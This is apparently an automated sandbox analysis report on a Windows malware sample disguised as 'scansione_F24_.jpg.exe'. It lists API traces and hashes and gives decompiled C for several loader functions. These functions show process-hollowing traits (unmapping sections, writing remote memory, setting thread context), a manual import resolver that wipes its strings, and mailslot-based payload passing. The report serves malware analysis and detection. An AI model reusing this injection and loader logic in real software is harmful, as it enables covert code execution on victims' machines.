Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: scansione_F24_.jpg.exe Analysis ID: 68428

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	E5C7B986B6FD3733504DB3FD6D6FAADA
Total matches:	32
Initial Analysis Report:	Open
Initial sample Analysis ID:	68428
Initial sample SHA 256:	9D2D7459EDA5BC0063FC6EF47DE20AFBFA28AA6981F0EE63D90AE3E10EC4F835
Initial sample name:	scansione_F24_.jpg.exe

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread

Similarity

Total matches: 29
API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
String ID: USER32.DLL$pnls$pnls
API String ID: 1514306980-1300720345
Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520

Strings

USER32.DLL, xrefs: 002E14D3, 002E14D8, 002E14FE
pnls, xrefs: 002E1526
pnls, xrefs: 002E151B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204

Similarity

Total matches: 204
API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
String ID:
API String ID: 1755075983-0
Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
CloseHandle.KERNEL32(002E7494), ref: 002E3FEC

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
